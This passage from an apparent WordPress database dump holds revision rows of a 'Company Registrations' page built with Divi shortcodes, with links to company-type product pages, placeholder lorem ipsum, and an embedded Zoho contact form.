header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" hover_enabled=\"0\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:02:23','2019-08-22 13:02:23','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33111,1,'2019-08-22 15:09:12','2019-08-22 13:09:12','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" width=\"87.3%\" custom_margin=\"|auto||181px||\" locked=\"off\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" width=\"100%\" custom_margin=\"||-12px|||\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|0px|auto||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" custom_padding=\"0px|||||\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" hover_enabled=\"0\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"600ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" hover_enabled=\"0\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" hover_enabled=\"0\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:09:12','2019-08-22 13:09:12','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33110,1,'2019-08-22 15:07:20','2019-08-22 13:07:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" width=\"87.3%\" custom_margin=\"|auto||181px||\" locked=\"off\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" width=\"100%\" custom_margin=\"||-12px|||\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|0px|auto||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" custom_padding=\"0px|||||\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" 